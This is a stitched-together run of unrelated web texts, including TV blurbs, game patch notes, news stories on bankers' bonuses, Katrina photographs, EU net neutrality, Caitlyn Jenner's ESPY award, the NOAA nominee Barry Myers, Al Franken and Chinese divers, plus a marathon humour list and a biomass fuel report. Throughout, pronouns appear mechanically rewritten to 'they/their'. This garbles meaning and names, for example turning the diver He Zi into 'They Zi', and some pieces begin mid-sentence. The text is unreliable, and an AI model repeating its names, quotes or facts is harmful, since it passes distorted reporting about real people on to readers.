The summer after they graduate from high school, a group of teens navigates friendship, romance and family relationships before heading off to college.
Ultraman
Years after Ultraman disappeared, Shinjiro learns of their connection to the legendary hero and dons the metallic ultra-suit to fight new aliens.
Upstarts
Determined to ride the burgeoning wave of startup companies, three college graduates set out to change the world while making millions.
Christmas in the Wild
After their husband leaves her, a stylish New Yorker goes on an African safari alone and finds new purpose in their life. Kristin Davis and Rob Lowe star.
Tiffany Haddish Stand Up Special
Tiffany Haddish brings their brash, barrier-breaking brand of comedy to Netflix with an exclusive one-hour stand-up special.
Pacific Rim
As monsters emerge from the sea to attack Earth, humanity fights back using giant robot warriors in this anime adaptation of the blockbuster film.
Celestine Soraka Splash Art Tweaked
Sona Icon Change
Thresh Ult Tool Tip update.
Balance Changes:
Changes to Previous Changes
( Relative to previous changes in this patch cycle )
Base damage decreased to 52 from 55.5
's splash art got altered a bit too. Added that in the post.The PBE has been updated with another tiny patch containing more small balance tweaks and other assorted, minor changes/fixes. Hopefully these minimal changes mean we are edging closer and closer to a live release.Continue reading for more details, including small tweaks to Celestine Soraka's splash art, Sona's icon, and more.The splash art for the new Celestine Soraka skin got tweaked just a little bit. the glow coming from their weapon is slightly different and it looks like a filter has been put over the whole thing.Sona's icon got zoomed in a bit.In addition to the lone balance change below,ult has had it's tool tip updated for clarity. The end now reads "An enemy cannot be affected by multiple walls simultaneously". The simultaneously part is what's new; how exciting.Miss out on a previous update from this patch cycle or need to refresh yourself on a previous set of changes? Here is a list for your convenience!
British banks should brace themselves for claims from "disgruntled" bankers who will not roll over and accept lower bonuses than usual despite the huge public and shareholder backlash against out-of-control pay, legal experts have warned.
One claim for £1.5m is understood to have already made its way into the system last year, after a banker believed their 2011 bonus was too low.
The case is believed to have been rejected before it got to court, with lawyers acting for the bank branding the claim "whimsical".
Judges are also said to be unsympathetic towards bankers' claims that their bonuses are too small in the current climate.
However, City lawyers said an increasing number of bankers were building cases in preparation of lower bonus payouts and were prepared to fight it out at court.
Richard Fox, employment partner at law firm Kingsley Napley, said: "We're seeing an increase in bankers seeking advice on their options. There are people [who will be] disgruntled they are getting fewer bonuses so why wouldn't they?
"Particularly if their team is doing well, or the UK is doing as well as it could despite the bank doing badly in other departments like the Swiss or French arm."
They said they had held discussions with bankers in recent weeks over the "wriggle room" in their contracts which could be exploited.
Bankers who did not "trust" the reward they received could work out what they thought they should have got based on a calculation of the bank's profits and their share in the type of bonus pool available, they said.
"These are the areas in which we hope to achieve something," Mr Fox said, adding bankers "are not the sort of people that don't consider their options".
Philip Davies, employment partner at Eversheds law firm, said discretionary bonuses were undoubtedly going to be smaller this year compared to last because there was less money to go around. But employees could "raise grievances" and bring claims over the judgment used to determine the size of payouts.
Mr Davies said: "Bankers could argue that when banks have exercised discretion, they have exercised that discretion in breach of contract."
The case would end up at the High Court but they warned bankers would have to show their bonus pot was "irrational or perverse" - difficult in the current climate when banks were under pressure to reign in excessive pay.
The moral of this story is that everyone should be able to enjoy booze at the local dive bar of their choice. It is about brotherhood between working men (and ladies). Because really, we're all just trying to enjoy ourselves, relax a little, and maybe drink too much and wake up Monday morning feeling like a dog was sitting on our face while we were passed out on the floor. Right?As I posted over in the forums, QC's server is currently undergoing a DoS (Denial of Service, ie stupid haxor bullshit) attack. Our kind webhost Nihilist is working like a madman to try and fend off this nefarious attempt to destroy our uptime, but there may be (and have been) momentary outages as they tweak and recompiles and debugs things. If you're having trouble accessing various things on QC, or if the site is loading slow, have patience. It will get better soon.Remember, Questionable Content T-shirts are only available for pre-order until this Wednesday! After that, you're limited to whatever stock I happen to have. It would be great if I could get a few more shirt orders, then I would be guaranteed to break even on this print run. Shirts are for awesome!In other news, I recently got iTunes for my PC and I am really loving it. The only problem is that my collection of 900+ mp3s do not have any ID3 tags on them. I have the artist name and album names all formatted already, because that is farily simple to do in iTunes itself. Naming each individual song, however, is a huge pain in the ass. CDDB info doesn't seem to work, so it looks like I am forced to add the song titles by hand. I'd rather not do that 800 times. If anyone knows of a quicker way to add individual song titles to batches of mp3s, please drop me a line at jephco (at) yahoo (dot) com.That's all for tonight. Enjoy the comic and I will see you on Wednesday!
Regular readers are likely familiar with the work of photographer Seph Lawless, whose hauntingly gorgeous images of abandoned malls and amusement parks have been regularly featured on the site. In keeping with their interest in forgotten places, Lawless recently paid a visit to New Orleans to document the city, and its people, a full decade after Hurricane Katrina made landfall. The result is a collection of photos that serves as a powerful and poignant testament to a resilient city that, 10 years later, is still recovering from the devastation of the costliest storm in America's history.
More of Lawless' work can be viewed on their Website, or by following them on Facebook, Twitter, Instagram, or Tumblr.
"Meet Darrick Toney, holding up all 10 fingers representing 10 years of surviving Hurricane Katrina," Lawless says. "After losing family members and close friends to the catastrophe, Darrick was sent to Texas like many others. They would move back after seven years away and now lives back in New Orleans and struggles to assimilate back to their hometown."
The MGM Grand Casino.
Images from a hotel/restaurant 10 years after the flood waters from Katrina.
"The homeless population has risen almost 80 percent since Hurricane Katrina," according to Lawless.
"I witnessed more and more people doing whatever they could to support themselves," says Lawless. "Sometimes not much more than what amounts to setting up a lemonade stand."
Images of abandoned schools.
A forgotten factory.
The Wanderer: "A local transient walks amongst the ruins of a nearby apartment complex littered with clothes and personal belongings," explains Lawless.
"In 1960, several African-Americans' homes were removed to make way for the new highway overpass," Lawless explains. "Today, the overpass serves as gigantic umbrella against the summer sun for the homeless and local transients."
Born from the Great Flood: Twin brothers Donovan and Devon, both 10 years old, "were born in the Lower 9th Ward just days after Hurricane Katrina," Lawless says. "They play near their home at an abandoned house."
Construction of a new home.
The Stairs That Lead Nowhere: "Perhaps the saddest images I've captured were the shots of empty stairs and platforms where houses once stood," Lawless says. "When I approached a group of men sitting on one of these structures in the Lower 9th Ward, a man pointed over to their friend and said 'This used to be their home.' The stairs that lead nowhere can be seen all throughout the most devastated areas of Hurricane Katrina. Sometimes right next to the new homes being built. [It's] a sharp contrast and sobering reminder of a painful transition."
"'The Irony' Street name," Lawless says.
While visiting the Lower 9th Ward, Lawless encountered a "displaced man taking refuge in an abandoned home that has a huge hole in the side of it from where a tree rammed into the house after flood waters devastated the area. The man now fishes and makes the best of their shelter."
We Will Rebuild: "A church offers hope and plans to rebuild 10 years after Katrina," Lawless says.
"'Vote Early' became a slogan after the disaster to encourage people to become more proactive in local government," according to Lawless.
Ten years after being destroyed by Hurricane Katrina, this Six Flags amusement park sits eerily abandoned.
The above images are all homes in the Lower 9th Ward, which famously suffered some of the storm's worst damage. "The hardest hit section of the city during Katrina was once the largest area of the city in which African-Americans owned homes," Lawless says.
The Color of Hope: "Even though most of the hardest hit areas of Katrina are open fields and abandoned, several colorful, modern homes designed with solar panels [and] futuristic designs are becoming more prevalent," Lawless says. "Actors Brad Pitt and Angelina Jolie started this movement with community leaders years ago with a promise to rebuild the Lower 9th Ward with affordable housing."
"Finally, I was able to sit down with FEMA's Ryan Mast to get old images of a few places right after Hurricane Katrina," says Lawless of their desire to create some before and after images, like the one of The Wilson School above, or two restored homes below. "I used those photographs to recreate them 10 years later. The same exact locations and shots—just 10 years later."
By Joe McNamee
The European Commission wants to bring an end to the open and competitive internet in Europe, for reasons that are not completely clear. Neither multiple consultations that showed the dangers of the approach, nor internal advice about the illegality of the proposals nor the needs of European citizens and businesses have been able to hold back the Commission's determination.
Now, the question is whether the European Parliament can act independently and, weeks before the upcoming elections in May, act in Europe's best interests. The European Commission remains determined to stop this from happening.
The task of the Commission in persuading the Parliament seems… or seemed… insurmountable. Not alone has the Parliament repeatedly voted in favour of net neutrality in various non-binding resolutions, but it is also a non-political issue among parliamentarians. The largest group, the EPP, adopted an extensive paper on the future of the Internet calling for net neutrality to be “enshrined in European law” while, on the other side of the political spectrum, the Socialists and Democrats Group are also strong supporters of protecting the social and economic benefits of the free and open internet.
How could the European Commission overturn this seemingly insurmountable support for net neutrality? It has a plan and, remarkably, the plan is nearly complete.
Step 1: Use the elections
The first step was to make sure that the legislative proposal was launched as close as possible to the European elections. This has the dual “benefit” of ensuring that parliamentarians would be distracted by their election campaigns and ensuring that they would be working under severe time pressures. As a result, after Commissioner Kroes promised legislative safeguards for net neutrality in 2010, they did not launch their legislative proposal until September 2013. In fact, the proposal could have been launched in May 2013, but that would not have achieved the same level of time pressures on parliamentarians.
Result: The Parliament is rushing, and quickly running out of time, to finalise its opinion on the proposal before the elections. Mission accomplished.
Step 2: Add a populist element
The measures taken by Commissioner Viviane Reding between 2004 and 2009 to bring an end to the excesses of the mobile telephone operators with regard roaming fees proved to be hugely popular and generated a lot of good publicity. So, the measure to undermine net neutrality was launched in a package with strict new measures on roaming, incentivising Parliamentarians to support the package for short-term political benefit, just weeks before the elections.
This gives Parliamentarians the possibility to push the “good news” about the end of high mobile phone roaming fees and gain any available political capital. The social and economic impact of the experimentation with the functioning of the free and open internet will not be felt until after the elections. At that stage… who cares?
Result: Key parliamentarians in the European Parliament's Industry Committee are chasing around national media claiming “credit” for bringing an end to roaming, while not fully conscious of the fact that they are also supporting anti-citizen, anti-competitive “compromises” in Brussels. Mission accomplished
Step 3: Use bizarre, complex language to make the meaning of the proposal difficult to understand
The online monopolies want to be able to pay for sponsored services, which have low download limits and/or faster access to their services (so, a user would be persuaded to have low limits, in return for a mininternet service sponsored by the online company). This will keep competitors out of the market and destroy competition and innovation. But how could the Commission possibly propose legislation that would facilitate this? The answer is to propose a text which says that discrimination is only allowed outside the framework of discriminatory contracts and download speeds – a text that sounds like it is banning discrimination. So, the Commission proposed that only:
Within the limits of any contractually agreed data volumes or speeds for internet access services, providers of internet access services shall not restrict the freedoms provided for in paragraph 1 by blocking, slowing down, degrading or discriminating against specific content, applications or services, or specific classes thereof, except in cases where it is necessary to apply reasonable traffic management measures.
Result: None of the leading Parliamentarians working on the dossier have been able to grasp the duplicity of this text and neither of the main “compromise amendments” to be voted on shortly will fix this problem. Mission almost accomplished.
Step 4: Pretend that you are supporting net neutrality
At the same time as proposing text which will undermine net neutrality in Europe, Commissioner Kroes is energetically claiming that they support it. With some very inventive public relations techniques from their team, anyone not familiar with the file would be mistaken for believing them
Result: Many parliamentarians are reassured that the Commissioner seems to be effectively able to communicate that they are protecting net neutrality at the same time as they are dismantling it. Parliamentarians are reassured that the political risks are therefore comparatively low. Mission accomplished
Conclusion
Over the next few weeks we will discover if a Parliament that was united in its support for net neutrality has now been successfully manipulated into bringing net neutrality to an end – against the interests of its citizens, against the interests of its businesses. Even worse, will it do so by the adoption of a misleading, bureaucratic EU-wide regulation?
There is still a long way to go in this dossier and there is a growing realisation in the European Parliament that there is something profoundly wrong with how this whole process is being managed by the European Commission. For more information on the campaign to save the free and open internet in Europe – and how citizens can participate – see savetheinternet.eu.
On Monday, Peter King of The MMQB revealed that the Eagles are targeting a trade up in the 2014 NFL Draft to land a wide receiver. The name he's heard the most is Odell Beckham Jr. with Marqise Lee being a backup plan if the Eagles stay at No. 22. On Tuesday, King released a mock draft that stayed consistent with what they originally had to say.
15. Philadelphia: Odell Beckham, WR-KR, LSU (Acquired from Pittsburgh for first- and second-round picks.)
A bit of a risky move, because the Eagles probably could have stayed at 22 and gotten Marqise Lee, another object of their affections. But the versatility of Beckham—who can play outside and slot and on returns—makes them a good replacement for DeSean Jackson. And cheaper.
Giving up 22 and 54 in exchange for 15 seems like it could be too rich for the Eagles' blood here, but I've always liked to keep an eye on King's mock drafts ever since they were one of the few who correctly predicted the Eagles would select Danny Watkins in 2011. Could have just been a lucky guess, but who knows.
Here's my theory about what King's hearing: he's not completely off-base. The Eagles might actually have some interest in trading up. I'm just not sure it's for Odell Beckham Jr. That's not meant to be a slight against him. Beckham is a fine player. I just think the Eagles wouldn't be leaking their true target. Perhaps Brandin Cooks could be the player they're targeting because it's hard to see them falling to No. 22 at this point. Or maybe it's someone else entirely.
Only two more days to go.
1 of 28 Full Screen Autoplay Close Skip Ad × Jenner on the cover of Vanity Fair: ‘Call me Caitlyn' View Photos The former Olympic decathlete has publicly come forward with their new name, and there's not a single “K” to be found. Caption The former Olympic decathlete has publicly come forward with their new name, and there's not a single “K” to be found. 2015 Caitlyn Jenner (formerly Bruce Jenner) is seen on the July 2015 cover of Vanity Fair. Courtesy of Vanity Fair Buy Photo Wait 1 second to continue.
On Monday, ESPN announced that it would honor Caitlyn Jenner at the 2015 ESPYs with the Arthur Ashe Courage Award. That July ceremony is set to be the stage for Jenner's first major public appearance since unveiling their new identity, which is likely to result in record ratings for the telecast.
Since then, a controversy has erupted on social media about whether Jenner should be getting the award, at least as compared to other possible candidates that some deem more worthy. Prominent among those candidates is Noah Galloway, who lost most of their left arm and leg as a soldier in Iraq, then went on to become a distance runner, personal trainer, motivational speaker and, recently, a third-place finisher on “Dancing With the Stars.”
[Everyone needs to stop freaking out over Caitlyn Jenner's courage award]
On Tuesday, many people took to Twitter to express disappointment, if not outrage, that ESPN picked Jenner over Galloway. The problem is that there is no indication that ESPN was ever weighing the merits of Galloway, or anyone else, against those of the former Bruce Jenner.
The sports network's press release announcing that Jenner would receive the Courage award makes no mention of any other nominees. The myth-busting Web site Snopes.com traced the misconception that Galloway was passed over to a tweet posted by Gerry Callahan, a Boston Herald columnist and co-host of the “Dennis and Callahan” radio show.
Caitlyn Jenner wins Arthur Ashe Courage Award. And the runner-up is …. pic.twitter.com/DKUdnPT8Gx — Gerry Callahan (@GerryCallahan) June 1, 2015
[Jon Stewart on Jenner coverage: ‘Your looks are … the only thing we care about']
In this and other tweets, Callahan revealed a mocking attitude toward ESPN's decision to honor Jenner. Nevertheless, the premise that they had been selected over Galloway became a meme:
If Caitlyn Jenner is more courageous then Noah Galloway then I'm not sure what kinda world I'm living in… pic.twitter.com/AbJLuzVpJa — Caylee Roth (@CayNoel) June 2, 2015
Sure enough, plenty of folks ran with it:
Bruce Jenner won the Arthur Ashe courage award over Army Veteran Noah Galloway? I am disappointed in ESPN's values. Let the boycott begin! — Larry Cox (@CoachLarryCox) June 2, 2015
@espn is a joke and everyone knows it. Giving Jenner courage award over Galloway is a travesty. — Ryan (@ryangentry4) June 2, 2015
I haven't seen one person not dissappointed with @espn and it's decision to give "Caitlyn Jenner" the courage award over Noah Galloway — Matt Mizak (@Matt_Mizak) June 2, 2015
anyone is feeling nauseous today? it's probably caused by @espn picking Jenner to win a courage & inspiration award instead of Noah Galloway — Jordan Morales (@jordanmomo7) June 2, 2015
@ espn Jenner over Galloway????? You should be ashamed!!! Truly appalling! !!! — tenvs (@TenVs) June 2, 2015
Questioning ever watching the @ESPYS after picking Jenner over @Noah_Galloway. they fought to make those choices possible for Jenner to make — Maria Albert (@MariaJordan23) June 2, 2015
Of course, there's nothing wrong with taking issue with ESPN's choice of Jenner, as compared to other potential honorees. Tuesday also saw many tweets claiming that would-be college basketball player Lauren Hill, who raised money to fight cancer before dying from their own rare condition this year, would have been a better choice.
And a case can certainly be made, as well, for Galloway, on their own inspiring merits. But it's simply not correct to criticize ESPN for relegating the veteran to “runner-up” status to Jenner.
The idea for this post came from @k8jeffree on Twitter. It's quite self explanatory. It's a list of the 11 annoying things that race spectactors scream at you to try to encourage you.
Don't get me wrong, I love and appreciate well wishers but you can only hear “you're looking good” so many times before you want to begin heckling them.
You're looking good! – I know how I feel. I've seen how I look in race photographs. You're just trying to be kind. If Satan gave birth to a gremlin and reversed over them in their pickup truck, they wouldn't look as half as bad as me at mile 16 in a marathon.
Only x miles to go! – OK I don't mind this if I'm only a mile from finishing the race, however most times spectators shout it when there's still 20 fucking miles left. It's all downhill from here! – Just because the next 100 meters are downhill doesn't mean the entire course is like that. Don't get my hopes up! It can kill your race if you believe someone who says this and then there's a huge hill at the end. What took you so long? – Your mother dragged me into the hedges at mile 14. That's what happened. I won't tell you what your father offered me at mile 20. Let's just say I'd have been out there for another 6 hours before it was over and my asshole would be as worn as the middle pockets of a pool table in a dive bar.
Come on! Sprint to the finish! – Chances are that I'm already moving as fast as I can lady. When I start sprinting that's when dangerous shit happens. I weave between runners and start to lose my balance. I'm still terrified of tripping up on the finishing line and landing on my head. You can do it number 6-5-6-8-5-3! I appreciate your encouragement. It's just a pain in the ass when you yell my race number and I can't remember it. I'm always thinking “Shit, is that me?” *looks down at bib and then trips over a pothole* You're a winner! – No. The winner finished 4 fucking hours ago and this is just a 10k. Stop trying to make me feel better about being slow! Run like you stole something – This was funny the first 5,000 times but it quickly grows tiring when you hear it 500 times a race. Besides I am running like I stole something. If you jog slowly then you're less likely to draw attention from store security. If you try to Usain Bolt your way out of a Walmart with a decade's supply of Tampons in your knickers, then they'll hunt you down eventually.
Pain is temporary, pride is forever! – Oh fuck off. When you're running a marathon your mind is seized with pain. You don't have enough left in there for any pride. You want it to end and to end now. I'll worry about pride once I've had my 4th post-race beer and by then I'll probably have got thrown out of the bar for waving my medal in the waiteres face, surfing for the whole “WOW you ran HOW far!?!?!?! I couldn't run HALF a mile. You brave bro. You brave!” spiel. Pusssshhhhhhhhh! – Don't give my asshole ideas, smart ass. You're doing great – I'm doing great? Really? I just took a shit in a hedge 1 mile back and I keep deliberately running veering the bus lane to see if one fancies finishing me off.
What do spectators shout that really pisses you off?
Barry Myers would join a roster of other business leaders whom President Donald Trump has installed atop their agencies. | Andrew Harrer/Pool/Getty Images Trump's pick for NOAA chief causes a storm
As a top executive at AccuWeather, Barry Myers has pushed for limits on the kinds of products that the National Weather Service offers to the public, saying they offered unfair competition to their industry.
Now, President Donald Trump's nomination of Myers to lead the weather service's parent agency could allow them to make those kinds of restrictions mandatory — to the benefit of their family-run forecasting company.
Story Continued Below
The AccuWeather CEO's nomination to head the National Oceanic and Atmospheric Administration is stirring criticism from people who worry they would hobble the weather service, which provoked an industry backlash more than a decade ago by making hour-by-hour forecasts, cellphone alerts and other consumer-friendly data widely available online. A bill that Myers supported 12 years ago, sponsored by then-Sen. Rick Santorum, would have prohibited the agency from competing with private providers in most circumstances.
Myers, who has served as a NOAA adviser, has more recently spoken of cooperation with the agency, including industry's advocacy for Congress to fund its budget. But their critics expressed misgivings nonetheless.
“I fear that he'll do irreparable harm to an agency whose primary mission is to save lives,” said Daniel Sobien, the president of the National Weather Service Employees Organization, which strongly opposes Myers' nomination. “There seems to be a huge conflict of interest considering their business background and belief system.”
Sen. Brian Schatz (D-Hawaii) agreed, calling Myers a “questionable” choice.
“As the CEO of AccuWeather, Barry Myers views NOAA as a direct competitor that provides high-quality forecasts for free,” Schatz said in a statement Thursday. They added that “Mr. Myers will have to work very hard to persuade me that they will run NOAA for the public good.”
Myers' defenders say they hope he'll use their long experience running a major weather enterprise to modernize NOAA, which also oversees fisheries, marine sanctuaries, endangered species, climate research, satellite data and its own uniformed officer corps.
The most reliable politics newsletter. Sign up for POLITICO Playbook and get the latest news, every morning — in your inbox. Email Sign Up By signing up you agree to receive email newsletters or alerts from POLITICO. You can unsubscribe at any time.
"In past decade, AccuWeather has embraced 'Big Data' and become an advertising & digital innovation behemoth under Myers' leadership," wrote Ryan Maue, the chief operations officer at the website Weather.us, in a post on Twitter. Maue separately told POLITICO: “I expect Myers to bring that same vision to NOAA and enhance collaboration with the private sector especially in the role of space-based remote sensing and satellites.”
Myers did not return a call to their office Thursday, and a lobbyist who works with AccuWeather did not respond to emails seeking comment.
Myers, whose brother Joel founded AccuWeather in 1962, would join a roster of other business leaders whom Trump has installed atop their agencies — many of them bringing considerable potential conflicts of interest to the job. They have degrees in law and business, not the science and math degrees that Bush's and President Barack Obama's NOAA chiefs had.
Richard Painter, who served as the top ethics official for President George W. Bush, said Myers can probably meet the legal requirements to separate themselves from their business. But, they added: “The appearances are awful. They should recuse from any matter that could have a financial impact on the company. And they should sell the stock.”
Myers indeed “will be liquidating all of their private sector holdings,” said a spokesperson for NOAA's parent agency, the Commerce Department, adding that he'll “be subject to the same ethics and recusal requirements as any federal official."
The spokesperson also rejected suggestions that Myers would clamp down on the weather service's public offerings. They said Commerce Secretary Wilbur Ross, who chose Myers for the job, “sees the provision of timely, accurate data to the public as one of the Department's core missions. This includes weather data provided by the NWS, so there is no risk that Myers will restrict NWS provision of data to the public."
“Myers has also been a strong proponent of free and open weather data to the public,” the spokesperson added.
But in 2005, Myers supported Santorum's widely panned bill, which would have prohibited the weather service from offering a product or service “that is or could be provided by the private sector” — a provision that would have benefited companies like AccuWeather.
The bill made some exceptions, including information needed to protect life and property, but weather entrepreneurs, hobbyists, airline pilots and open-government advocates said it would have choked off a wealth of data that the National Weather Service had begun making widely available. The legislation would have countered a 2004 policy change by the Bush administration that had eased restrictions on the weather service's ability to offer new products and services.
“It is not an easy prospect for a business to attract advertisers, subscribers, or investors when the government is providing similar products and services for free,” Santorum said when introducing their bill. Critics, including Sen. Bill Nelson (D-Fla.), noted that taxpayers had already paid for the weather service's data.
Myers told The Palm Beach Post at the time that they wanted the weather service to return to its “core mission … which is protecting other people's lives and property," rather than spending “hundreds of millions of dollars a year, every day, producing forecasts of 'warm and sunny.'"
"We work hard every day competing with other companies and we also have to compete with the government," they told ABC News a month later.
Myers had donated $1,000 to Santorum's Senate campaign in 2004 and 2005, though the executive also has a track record of donating to both Democratic and Republican politicians, including Trump, Hillary Clinton and Mitt Romney. Santorum and Myers are both prominent alumni of Penn State University, and AccuWeather is based near the school's main campus in State College, Pa.
Santorum's bill went nowhere, however — an outcome that Maue said turned out to be “the best thing that could have happened for Accuweather as they were on the ground floor of the digital/smart phone App revolution for weather apps.”
More recently, Myers testified to the House Science Committee last year about the need for "embracing free and open data in all situations," while maintaining that "the best public facing forecasts and information comes from the weather industry." Still, they said government, industry and academia each bring their own strengths to the relationship, adding that "NWS need not do everything to keep Americans safe. Others can share the load."
Myers estimated that cooperation among the federal government, the private weather industry and academic researchers had saved 1 million to 2 million lives since the late 1950s.
But Sobien, the union chief, expressed skepticism about the kind of partnership Myers envisions.
"In the past, they have supported proposals that essentially made it so the National Weather Service's only function was to provide data to companies like AccuWeather who would then repackage that data and sell them," Sobien said.
AccuWeather, which says its forecasts appear on more than 200 major television stations, 900 radio stations and 180,000 websites, has also been aggressive over the years in criticizing the weather service for what it sees as its shortcomings. Among other incidents, the company complained that the weather service had underestimated the strength of Hurricane Claudette before it hit Texas in 2003, and it said the federal agency was late to issue warnings about a 2015 tornado in Oklahoma.
As recently as February, AccuWeather's website highlighted an incident in which some of NOAA's weather data suffered a “significant outage,” while noting that “AccuWeather-produced services remained available and reliable.”
AccuWeather's sharp-elbowed approach also extends to competition with its rival The Weather Channel, which it replaced two years ago on Verizon's FiOS television lineup. AccuWeather's website has also inspired eye-rolling among some in the weather community by offering 90-day forecasts, which one meteorologist blogging for the American Geophysical Union dismissed as “scientifically indefensible” and “even worse than the Farmer's Almanac.”
Members of the small community of weather watchers, who never forgot AccuWeather's support for Santorum's bill, contend it will be nearly impossible for Myers to fully eliminate their conflicts of interest.
Myers' brother Joel still serves as the company's president and chairperson of the board. Their brother Evan is the chief operating officer.
“His family owns the business and they know the decisions they make are going to affect the business for years and potentially decades to come,” said Andrew Rosenberg, director of the Union of Concerned Scientists' Center for Science and Democracy. They added, “My biggest concern is not that somebody has a business background, but do they genuinely recognize that a job in government is a fundamentally different one from managing and running a private business for profit.”
Others are reserving judgment.
David Titley, a former NOAA official during the Obama administration, said they prefer not to comment on personnel decisions. "We will all have to wait & see in what direction Barry wants to take NOAA," they said in an email.
WASHINGTON (JTA) — (JTA) — Sen. Bernie Sanders and Sen. Chuck Schumer said their colleague Al Franken's announcement scheduled for Thursday should include their resignation following accusations of sexual harassment from more than a half dozen women.
“Sen. Franken has said that they will be making an announcement about their political future tomorrow. The right thing is for them to resign,” Sanders, I-Vt., who ran for president as a Democrat in the 2016 elections, said in a statement issued Wednesday afternoon.
“We are now at a crossroads in American culture. And it is an important one. The way we treat women in our country has been abysmal in almost every way. We are finally addressing the issue of sexual harassment, and we need to get it right.”
Schumer, D-N.Y., the minority leader, told the New York Times in a statement that “I consider Senator Franken a dear friend and greatly respect their accomplishments, but they have a higher obligation to their constituents and the Senate, and they should step down immediately.”
Franken on Twitter said a Minnesota Public Radio report that was set to resign on Wednesday was premature. They said they were still consulting with their family.
At least 22 Democratic senators, many of them women, have called on Franken, a Minnesota Democrat, to resign as of Wednesday afternoon.
Sens. Ron Wyden of Oregon and Dianne Feinstein of California also said Wednesday on Twitter that resignation was the “right thing” for Franken. Both are Jewish, as are Schumer, Franken and Sanders.
Following the calls for their resignation after another woman came forward on Wednesday to accuse them of sexual harassment, Franken's office said they would make an “announcement” on Thursday. The office did not say what the nature of the announcement would be.
Seven women have come forward to accuse Franken of touching them inappropriately during photo opportunities and campaign events. The accusations date from between 2003 and 2010.
The latest accusation, reported Wednesday morning on Politico, comes from an unnamed former Democratic congressional aide who said Franken tried to forcibly kiss them after a taping of their radio show in 2006, three years before they became a U.S. senator.
Franken, a former “Saturday Night Live” performer, has joined leaders of both parties in the Senate in asking for an ethics investigation against him. The Senate Ethics Committee on Thursday opened a preliminary investigation into the accusations against Franken.
RIO DE JANEIRO: Love was all in the air around packed stadium in Rio De Janeiro when a Chinese girl athlete was proposed for marriage.
They Zi and Qin Ka have been in relationship for six years now.
Silver medalist They Zi was taken by surprise when Olympian Qin Kai proposed at poolside before they said “yes” to their boyfriend of six years. Cheered on by the crowd, Qin took out a small box and slipped the ring on He's finger and gave them a red rose encased in glass.
Qin, bronze medallist in the men's 3m synchronised springboard, got down on one knee whilst silver medallist They were on their lap of honour and, after a lengthy wait, finally got the all-important “yes” they were looking for.
“He said a lot of things, made a lot of promises, but I think the thing that touched me the most is I think this is the guy I can trust for the rest of my life,” said He, proudly displaying their shiny new ring.
They and Qin have been dating since 2010, and whilst being caught off guard, they admitted they nearly rumbled their plan as Qin got in some proposal practice on Sunday morning.
“This morning in their room they were reciting something and I didn't notice (what it was). I asked them and they said they were singing,” added He, who also won silver in London four years ago.
“I didn't know they were (practicing) the proposal.”
Shi was more in the loop as they had the inside track on Qin's plans.
“Both of them have gone through a lot. It is a very special moment for them,” said the champion, who delivered their second gold of the Games after teaming up with Wu Minxia in the 3m synchronised springboard. –SAMAA/agencies
By Andrew M. Seaman
(Reuters Health) - Efforts to ban parents from subjecting their lesbian, gay, bisexual and transgender (LGBT) children to “conversion therapy” got a boost on Thursday from a U.S. government report that said the practice was dangerous and must stop.
The Obama administration backed a petition in April to ban the practice nationwide, and the Substance Abuse and Mental Health Services Administration (SAMHSA) report gives further scientific backing to such calls.
“We believe that conversion therapy for young people is not in their best interest, and the facts and the evidence supports that,” White House senior adviser Valerie Jarrett said.
“We would support, and have supported, making it illegal for young people,” they told reporters, noting that adults “make their own decisions” when it comes to their health.
Four U.S. states and Washington banned the practice among minors and vulnerable adults as of August 2015, the report said, and 21 more states and Congress have considered or are considering bans.
Human Rights Campaign, an LGBT advocacy group, welcomed the report, saying it should prompt a ban in all 50 states.
The therapy, that aims to change sexual orientation, gender identity or gender expression, is often conducted by practitioners who are unlicensed and have religious, not medical, training, experts say.
The American Psychological Association's (APA) government relations director, Judith Glassgold, said such therapy can trigger depression, anxiety, suicidal thoughts, hurt self-esteem and lead to substance abuse and risky sexual behaviors.
“Conversion therapies or other efforts to change sexual orientation, gender identity or gender expression are not effective, reinforce harmful gender stereotypes and are not appropriate mental health treatments,” said SAMHSA Special Expert on LGBT Affairs, Elliot Kennedy.
The Clarkstown Town Board approved two tax certiorari settlements amounting to almost $3,000 for properties in Nanuet and Valley Cottage at Tuesday night's meeting.
The assessment for 150A Main Street in Nanuet owned by Morris Properties LLC will be reduced for 2011/2012 and 2012/2013 from $358,300 to $325,000 at a cost of $819.32 to the town.
The assessment for 206 Route 303 in Valley Cottage, which is owned by Richard and Kathy King, will be reduced for 2011/2012 and 2012/2013 from $400,500 to $312,400. The town will reimburse the property owners $2,167.63.
At a previous meeting, the board approved a tax cert settlement with the Board of Managers of Esquire Village Office Condominium. The office condominium is located at 10 Esquire Road in New City. The agreement for property tax reduction covers 2010/2011. The assessment will be reduced from $1,072,225 to $986,447 at a cost of $2,023.16 to the town.
Biomass can be converted to fuels via a process called gasification, which uses high temperatures to break feedstock down into carbon monoxide and hydrogen, which can then be made into various fuels, including hydrocarbons. But there's a major drawback–about half of the carbon in the biomass gets converted to carbon dioxide rather than into carbon monoxide, a precursor for fuels. Now researchers in University of Minnesota and the University of Massachusetts, Amherst, have developed a method for gasifying biomass that converts all of the carbon into carbon monoxide.
Furnace fuel: Small white particles of cellulose fall onto a hot catalyst bed in the presence of carbon dioxide, oxygen, and methane. The catalysts break down cellulose and methane into hydrogen and carbon monoxide, which can be used to make liquid fuels.
In the new approach, the researchers gasify biomass in the presence of precisely controlled amounts of carbon dioxide and methane, the main component of natural gas, in a special catalytic reactor that the researchers developed. When they did this, all of the carbon in both the biomass and the methane was converted to carbon monoxide. “In the chemical industry, even a few percent improvement makes a big impact. The increase from 50 percent to 100 percent is profound,” says Dionisios Vlachos, the director of the Catalysis Center for Energy Innovation at the University of Delaware.
To increase the yields from gasification, researchers at the University of Minnesota and UMass Amherst added carbon dioxide, which promotes a well-known reaction: the carbon dioxide combines with hydrogen to produce water and carbon monoxide. But adding carbon dioxide isn't enough to convert all of the carbon in biomass into carbon monoxide instead of carbon dioxide. It's also necessary to add hydrogen, which helps in part by providing the energy needed to drive the reactions. It's long been possible to do each of these steps in separate chemical reactors. The researchers' innovation was to find a way to combine all of these reactions in a single reactor, the key to making the process affordable.
The process could both greatly reduce greenhouse gas emissions and increase the amount of fuel that can be made from an acre of biomass using gasification. Many companies are pursuing biological approaches to converting biomass into fuel (using enzymes and yeast, for example), rather than thermochemical methods such as gasification, in part because biological approaches tend to convert more biomass into the desired fuel than thermochemical methods. But biological approaches are each designed to work with just one type of biomass. Gasification has the advantage of being more flexible. The same facility could potentially process grass, wood, and even old tires.
